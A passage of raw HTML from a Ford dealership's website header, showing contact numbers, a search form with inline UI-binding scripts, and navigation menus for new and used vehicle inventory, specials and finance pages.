sc-cCbXAZ static-text sc-fHSTwm gGrDQo">Service: (817) 500-0097</div></div></a></div><div class="sc-AnqlK sc-iBmynh sc-hycgNl iBzoRC"><a class="sc-dTLGrV static-anchor undefined sc-ivVeuv kcrZik" href="tel:+1(817) 500-0094"><div class="sc-dRCTWM sc-cgHJcJ dLLOIG"><div class="sc-AnqlK sc-iBmynh sc-cCbXAZ static-text sc-fHSTwm gGrDQo">Parts: (817) 500-0094</div></div></a></div><div class="sc-AnqlK sc-iBmynh sc-hycgNl iBzoRC"><a class="sc-dTLGrV static-anchor undefined sc-ivVeuv kcrZik" href="translate:es"><div class="sc-dRCTWM sc-cgHJcJ dLLOIG"><div class="sc-AnqlK sc-iBmynh sc-cCbXAZ static-text sc-fHSTwm gGrDQo">Español</div></div></a></div><div class="sc-AnqlK sc-iBmynh sc-hycgNl iBzoRC"><a class="sc-dTLGrV static-anchor undefined sc-ivVeuv kcrZik" href="/hours-directions/"><div class="sc-dRCTWM sc-cgHJcJ dLLOIG"><div class="sc-AnqlK sc-iBmynh sc-cCbXAZ static-text sc-fHSTwm gGrDQo">Hours &amp; Directions</div></div></a></div></div><div class="sc-AnqlK sc-kkwfeq hRUATH"><div class="sc-AnqlK sc-iBmynh sc-lnrBVv kbeoZe"><div class="sc-AnqlK sc-bYnzgO kxVeRj"><div data-jzlbind-tap=" jzlMergeState({ 'sideRailState': { open: true, page: 'shop', }, }) " class="sc-AnqlK sc-cPuPxo llBlWg"><div role="button" tabindex="0" hidden="" width="150px" data-jzlbind-hidden="!(h('cognito.account_buttons.recent_vehicles_count') > 0)" class="sc-AnqlK sc-hvvHee fQohMY"><div class="sc-AnqlK sc-hkbPbT cTBZKL">Recently Viewed</div></div><div role="button" tabindex="0" hidden="" width="80px" data-jzlbind-hidden="!(h('cognito.account_buttons.favorite_vehicles_count') > 0)" class="sc-AnqlK sc-hvvHee fQohMY"><div class="material-icons undefined sc-cCVOAp ivnIst" color="#fef131">star</div><div data-jzlbind-text="h('cognito.account_buttons.favorite_vehicles_count')"></div></div><div role="button" tabindex="0" hidden="" width="80px" data-jzlbind-hidden="!(h('cognito.account_buttons.notifications_count') > 0)" class="sc-AnqlK sc-hvvHee fQohMY"><div class="material-icons ringing-bell sc-cCVOAp cNICw" color="#00cb4e">notifications</div><div data-jzlbind-text="h('cognito.account_buttons.notifications_count')"></div></div></div></div><div role="button" tabindex="0" data-jzlbind-tap=" jzlBindElement('cognito-event-node_DataForm').submit(), jzlMergeState({ 'sideRailState': { open: !h('sideRailState.open'), page: h('cognito.any_vehicles_selected') ? 'shop' : 'account' }, }) " class="sc-AnqlK sc-hkbPbT bOFJPm"><div data-jzlbind-text="!h('sideRailState.open') ? 'ACCOUNT' : 'CLOSE'" class="sc-jRhVzh sc-iHhHRJ lhlhHJ">ACCOUNT</div></div></div></div></div></div></div><div class="sc-dYzWWc gaQNmc sc-gMcBNU fgfzKz" data-jzlbind-class="'sc-dYzWWc gaQNmc ' + (&quot;empty&quot;)" sizes="mobile,tablet,tabletLg"><div height="50px" width="100%" class="sc-AnqlK sc-iLVFha fTmTgB"><div height="100%" width="100%" color="!uxBarTextColor" font-size="16px" class="sc-AnqlK sc-iLVFha gWkFJj"><div class="sc-AnqlK sc-kkwfeq jmTZTf"><div role="button" tabindex="0" data-jzlbind-tap="(function () { window.jzlRocketBarButtonToggleActivePanel('site-menu');window.jzlRocketBarButtonHideBars(['count-bar','search-bar']); jzlMergeState({filtersSearchState: {loadData: true}}); })()" class="sc-AnqlK sc-iBmynh sc-cfWELz jZagIT"><div class="sc-hizQCF dXfVbp" role="button" tabindex="0" size="24" color="!uxBarTextColor"><div size="24" color="!uxBarTextColor" class="sc-eNPDpu ciHSzG"><div hidden="" data-jzlbind-class="(h('panels.activePanel') == 'site-menu') ? 'pressed' : ''"></div><span size="24" color="!uxBarTextColor" class="sc-hARARD sc-ccLTTT vKYFT"></span><span size="24" color="!uxBarTextColor" class="sc-hARARD sc-hlILIN enQHra"></span><span size="24" color="!uxBarTextColor" class="sc-hARARD sc-jQMNup gljXzW"></span></div></div></div></div><div class="sc-AnqlK sc-kkwfeq dahGoY"><div class="sc-AnqlK sc-iBmynh sc-hycgNl iBzoRC"><a class="sc-dTLGrV static-anchor undefined sc-ivVeuv fNrxUM" href="https://www.5starford.com"><div class="sc-dRCTWM sc-cgHJcJ dLLOIG"><div class="sc-AnqlK sc-iBmynh sc-cCbXAZ static-text sc-fHSTwm bhZWVx">Five Star Ford</div></div></a></div></div><div class="sc-AnqlK sc-kkwfeq hRUATH"><div role="button" tabindex="0" data-jzlbind-tap="(function () { (function () { if ((h('bars.activeBars') || []).map(function(x) { return x(); }).some(function(x) { return x === 'search-bar' })) { window.jzlRocketBarButtonHidePanel('search-panel') } else { window.jzlRocketBarButtonShowPanel('search-panel') } })();window.jzlRocketBarButtonToggleActiveBars(['search-bar']); jzlMergeState({filtersSearchState: {loadData: true}}); })()" class="sc-AnqlK sc-iBmynh sc-cfWELz fpvGHZ"><div class="sc-bJHhxl iShdGc" role="button" tabindex="0" size="40" color="!uxBarTextColor"><div size="40" color="!uxBarTextColor" class="sc-TuwoP iXbImb"><div hidden="" data-jzlbind-class="( h('bars.activeBars') .map(function(x) { return x(); }) .some(function(x) { return ['search-bar'].includes(x); }) ) ? 'pressed' : ''"></div><div class="sc-fQkuQJ jFfcVg"><svg fill="rgb(0, 0, 0)" viewBox="0 0 24 24" width="40" height="40"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"></path><path d="M0 0h24v24H0z" fill="none"></path></svg></div><span size="40" color="!uxBarTextColor" class="sc-epGmkI sc-dphlzf jHYgqG"></span><span size="40" color="!uxBarTextColor" class="sc-epGmkI sc-fCPvlr klovN"></span></div></div></div></div></div></div></div><div class="sc-dYzWWc clkpzw hidden hiddenTop sc-gMcBNU fgfzKz" data-jzlbind-class="'sc-dYzWWc clkpzw ' + ((h('bars.activeBars').map(function(x) { return x() }).filter(function(x) { return x != null &amp;&amp; x != &quot;&quot;; }).join(' ')) + &quot; &quot; + (h('bars.activeBars').map(function(x) { return x(); }).includes('search-bar') ? &quot;empty&quot; : &quot;hidden hiddenTop&quot;))" sizes="mobile,tablet,tabletLg"><div height="50px" width="100%" class="sc-AnqlK sc-iLVFha hKIHkW"><div height="100%" width="100%" color="!searchPanelTextColor" font-size="16px" class="sc-AnqlK sc-iLVFha ifXMVA"><div width="50%" class="sc-AnqlK sc-kkwfeq cBuhVE"><div class="sc-AnqlK sc-iBmynh sc-fvLVrH ePzbUR"><div class="sc-AnqlK sc-eSePXt cpuTFS collapsed sc-iBmynh dYiuYL" data-jzlbind-class="'sc-eSePXt cpuTFS ' + (h('stateMobileUxExpandingSearch.open') ? 'expanded' : 'collapsed')"><div role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ stateMobileUxExpandingSearch: { open: !h('stateMobileUxExpandingSearch.open'), }, }), jzlBindElement('expanding-search-input-bound').focus() " class="sc-AnqlK sc-iBmynh sc-dXfzlN sc-iIHjhz gZQuSJ"><div class="sc-jHZirH iYFWlJ"><svg class="search-icon" fill="rgb(0, 0, 0)" viewBox="0 0 24 24" width="20" height="20" style="pointer-events:none"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"></path><path d="M0 0h24v24H0z" fill="none"></path></svg><div class="sc-isBZXS bHmKEV">Search<div class="type-filters sc-hAXbOi byBKp sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi byBKp ' + ('')" hidden="" data-jzlbind-hidden="!(window.jzlRocketSearchAnyTextFilters(hf('filtersState.selectedFilters')))"><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></div></div></div><div class="sc-AnqlK sc-iBmynh sc-dXfzlN sc-aewfc sc-dKEPtC guuAai"><form id="expanding-search-form-bound" method="GET" target="_top" action="https://www.5starford.com/jzlrocket-nav/query/" data-jzlbind-submit=" event.preventDefault(), jzlBindElement('filters-submit-button').click(), jzlMergeState({ stateMobileUxExpandingSearch: { open: !h('stateMobileUxExpandingSearch.open'), }, }) " class="sc-dBAPYN exoXFF"><input type="hidden" name="srp_id" value="2088"><input type="search" id="expanding-search-input-bound" name="q" placeholder="Search Inventory" data-jzlbind-value=" h('filtersState.selectedFilters.textSearch', 0) " data-jzlbind-change=" value = event.target.value, jzlMergeState({ filtersState: { selectedFilters: { textSearch: value != '' ? [ value ] : null, }, }, }), jzlAnalytics('ROCKET_EXPANDING_SEARCH', { value: value }) " class="sc-dvpmds jyZdVf"><div role="button" tabindex="0" data-jzlbind-tap=" jzlBindElement('expanding-search-form-bound').submit() " class="sc-dwztqd kuFcw"><svg class="sc-fgrSAo ghJdpo" fill="rgb(65, 146, 247)" viewBox="0 0 24 24" width="24" height="24"><path d="M0 0h24v24H0z" fill="none"></path><path d="M12 4l-1.41 1.41L16.17 11H4v2h12.17l-5.58 5.59L12 20l8-8z"></path></svg></div></form></div><div role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ stateMobileUxExpandingSearch: { open: !h('stateMobileUxExpandingSearch.open'), }, }) " class="sc-AnqlK sc-iBmynh sc-dXfzlN sc-aewfc sc-jHXLhC iUPnKw"><svg fill="rgb(128, 128, 128)" viewBox="0 0 24 24" width="20" height="20" style="pointer-events:none"><path d="M19 6.41L17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"></path><path d="M0 0h24v24H0z" fill="none"></path></svg></div></div></div></div><span class="sc-cgzHhG gUtyqO"></span><div width="50%" data-jzlbind-hidden="h('stateMobileUxExpandingSearch.open')" class="sc-AnqlK sc-kkwfeq bTXjyx"><div class="sc-cbMPqi QIhzG sc-izvnbC fcpGyf" data-jzlbind-class="'sc-cbMPqi QIhzG ' + (((h('panels.activePanel') == 'search-panel') ? ' selected ' : ''))"><div role="button" tabindex="0" data-jzlbind-tap="(function () { jzlMergeState({filtersSearchState: {loadData: true}}); })()" class="sc-AnqlK sc-iBmynh sc-cfWELz fpvGHZ"><div class="sc-kAdXeD iVZfZX"><svg fill="rgb(0, 0, 0)" width="20" height="20" viewBox="0 0 112 112"><path d="M21.94,63.58h-4.67v22.84h4.68V99h7V86.42h5.17V63.58h-5.17V13h-7L21.94,63.58L21.94,63.58z M49.58,44.58v22.84h4.92V99l7,0V67.42h4.92V44.58H61.5V13h-7v31.58H49.58z M82.14,25.58v22.84h4.92V99h7V48.42h4.92V25.58h-4.92V13h-7v12.58H82.14z"></path></svg><span class="sc-hCaUpS cZKdEb">Filter<div class="type-filters sc-hAXbOi byBKp sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi byBKp ' + ('')" hidden="" data-jzlbind-hidden="!(window.jzlRocketSearchAnyFilters(hf('filtersState.selectedFilters')))"><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div></div></div></div></div></div></div><div class="sc-dYzWWc kowUgC sc-gMcBNU fgfzKz" data-jzlbind-class="'sc-dYzWWc kowUgC ' + (&quot;empty&quot;)" sizes="desktop,desktopLg"><div height="75px" width="100%" color="!desktopHeaderTextColor" class="sc-AnqlK sc-iLVFha bVNQtI"><div height="100%" width="100%" class="sc-AnqlK sc-iLVFha BmyUS"><div class="sc-AnqlK sc-kkwfeq jmTZTf"><div class="sc-AnqlK sc-iBmynh sc-hycgNl kQUstK"><a class="sc-dTLGrV static-anchor undefined sc-ivVeuv ewREaR" href="https://www.5starford.com"><img src="https://images-stag.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/logo_nrh.png" width="142" height="109" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="rocket-contain-self sc-cLQEGU cETcYM"></a></div><div class="sc-AnqlK sc-iBmynh sc-hycgNl iBzoRC"><a class="sc-dTLGrV static-anchor undefined sc-ivVeuv fNrxUM" href="https://www.5starford.com"><div class="sc-dRCTWM sc-cgHJcJ dLLOIG"><div class="sc-AnqlK sc-iBmynh sc-cCbXAZ static-text sc-fHSTwm ihHzTK">Five Star Ford of North Richland Hills</div></div><div class="sc-AnqlK sc-iBmynh sc-cCbXAZ sc-fHSTwm gYKnlV">NATION'S ONLY 17-YEAR TRIPLE CROWN AWARD WINNER</div></a></div></div><div width="450px" class="sc-AnqlK sc-kkwfeq cZYTXH"><div class="sc-AnqlK sc-iBmynh sc-hycgNl bcmlAL"><div class="sc-AnqlK sc-iBmynh sc-chAAoq bCwyST"><img src="https://images-stag.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/bit_logo2.png" width="354" height="112" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="rocket-contain-self sc-cLQEGU cETcYM"></div></div></div></div></div></div><div class="sc-dYzWWc kowUgC sc-gMcBNU fgfzKz" data-jzlbind-class="'sc-dYzWWc kowUgC ' + (&quot;empty&quot;)" sizes="desktop,desktopLg"><div height="50px" width="100%" id="desktop-header-menu-bar" class="sc-AnqlK sc-iLVFha dWbMJH"><div height="100%" width="100%" class="sc-AnqlK sc-iLVFha BmyUS"><div class="sc-AnqlK sc-kkwfeq dahGoY"><nav class="sc-guztPN main-navigation rocket-menu-bar menu-mode-flex sc-cFlXAS fqQIYr" color="!desktopHeaderMenuBarTextColor"><div class="sc-AnqlK menu-item-has-children menu-item sc-hcnlBt fnTrKJ"><a href="https://www.5starford.com/inventory/new-vehicles/" target="" class="sc-gJqsIT sc-kDhYZr fMRSaM"><div class="sc-AnqlK menu-entry-text sc-bvTASY eYoIVe">New Ford</div></a><div class="sc-AnqlK sc-sPYgB menu-group sc-dHIava lgshOj" color="!desktopHeaderMenuFlyoutTextColor" direction="right"><div class="sc-AnqlK menu-item-has-children menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/new-vehicles/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">All Ford Models</div></a><div class="sc-AnqlK sc-sPYgB menu-group sc-jhaWeW jIEeni" color="!desktopHeaderMenuFlyoutTextColor" direction="right"><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/c-max" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">C-MAX Hybrid</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/new-vehicles/models=Ford_Ecosport" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Ecosport</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/f-150" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">F-150</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/fiesta" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Fiesta</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/escape" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Escape</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/super-duty" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Super Duty</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/focus" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Focus</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/edge" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Edge</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/new-vehicles/models=Ford_Ranger" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Ranger</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/fusion" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Fusion</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/flex" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Flex</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://5starford.worktrucksolutions.com/?bodyTypes=Cargo_Van,Van_Upfit" target="_blank" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Transit Cargo Van</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/mustang" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Mustang</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/explorer" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Explorer</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://5starford.worktrucksolutions.com/Transit%20Connect" target="_blank" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Transit Connect</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/taurus" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Taurus</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/expedition" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Expedition</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://5starford.worktrucksolutions.com/Passenger_Wagon" target="_blank" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Transit Wagon</div></a></div></div></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/just-reduced/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Just Reduced</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/lifted-trucks/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Lifted Trucks</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/new-vehicles/text=raptor+sort=_score,desc,,display_price,asc" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Raptor</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://5starford.worktrucksolutions.com/?utm_source=retailsite&amp;#038;utm_medium=linkrec&amp;#038;utm_campaign=mainnav&amp;#038;utm_term=worktrucks" target="_blank" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Work Trucks</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://5starford.worktrucksolutions.com/?utm_source=retailsite&amp;#038;utm_medium=linkrec&amp;#038;utm_campaign=mainnav&amp;#038;utm_term=new" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">New Work Trucks</div></a></div><div class="sc-AnqlK menu-item-has-children menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/research/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Research</div></a><div class="sc-AnqlK sc-sPYgB menu-group sc-jhaWeW jIEeni" color="!desktopHeaderMenuFlyoutTextColor" direction="right"><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/ford-truck-center-near-fort-worth-tx" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Ford Truck Center</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/all-new-2019-ford-ranger-in-fort-worth-tx/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">2019 Ford Ranger</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/ford-f150-and-super-duty-near-dallas-tx" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">2018 Ford F-150 &amp; Super Duty</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/buy-or-lease-the-first-ever-ford-ecosport-near-dallas-tx/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">2018 Ford EcoSport</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/2018-ford-expedition-for-sale-in-dallas-tx/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">2018 Ford Expedition</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/college-graduates-students/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">College Graduates &amp; Students</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/ford-vehicle-exchange-program-near-fort-worth-tx/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Vehicle Exchange Program</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/video-gallery/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Ford Video Gallery</div></a></div></div></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/choose-specialist/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Choose Your Product Specialist</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/value-your-trade/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Value Your Trade</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/sync-owners-clinics/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">SYNC Owner's Clinics</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/ford-vehicle-exchange-program-near-fort-worth-tx/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Vehicle Exchange Program</div></a></div></div></div><div class="sc-AnqlK menu-item-has-children menu-item sc-hcnlBt fnTrKJ"><a href="https://www.5starford.com/inventory/used-vehicles-merged/" target="" class="sc-gJqsIT sc-kDhYZr fMRSaM"><div class="sc-AnqlK menu-entry-text sc-bvTASY eYoIVe">Used Cars</div></a><div class="sc-AnqlK sc-sPYgB menu-group sc-dHIava lgshOj" color="!desktopHeaderMenuFlyoutTextColor" direction="right"><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/used-vehicles-merged/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Search Inventory</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/certified-pre-owned/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Certified Used Cars</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/new-arrivals/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">New Arrivals</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/used-cars-for-sale-under-5000/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Cash Vehicles</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/used-cars-under-10k/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Vehicles Under $10,000</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/used-specials/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Used Specials</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/choose-specialist/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Choose Your Product Specialist</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/ford-certified-program/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Ford Certified Benefits</div></a></div></div></div><div class="sc-AnqlK menu-item-has-children menu-item sc-hcnlBt fnTrKJ"><a href="https://www.5starford.com/new-ford-specials-north-richland-hills-tx/" target="" class="sc-gJqsIT sc-kDhYZr fMRSaM"><div class="sc-AnqlK menu-entry-text sc-bvTASY eYoIVe">Specials</div></a><div class="sc-AnqlK sc-sPYgB menu-group sc-dHIava lgshOj" color="!desktopHeaderMenuFlyoutTextColor" direction="right"><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/new-ford-specials-north-richland-hills-tx" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Lease and Finance Specials</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/new-inventory-specials/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Demo and Loaner Specials</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/inventory/used-specials/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Used Specials</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/service-specials/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Service Specials</div></a></div></div></div><div class="sc-AnqlK menu-item-has-children menu-item sc-hcnlBt fnTrKJ"><a href="https://www.5starford.com/finance-center/" target="" class="sc-gJqsIT sc-kDhYZr fMRSaM"><div class="sc-AnqlK menu-entry-text sc-bvTASY eYoIVe">Finance</div></a><div class="sc-AnqlK sc-sPYgB menu-group sc-dHIava lgshOj" color="!desktopHeaderMenuFlyoutTextColor" direction="right"><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/finance-application/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Apply Online</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC 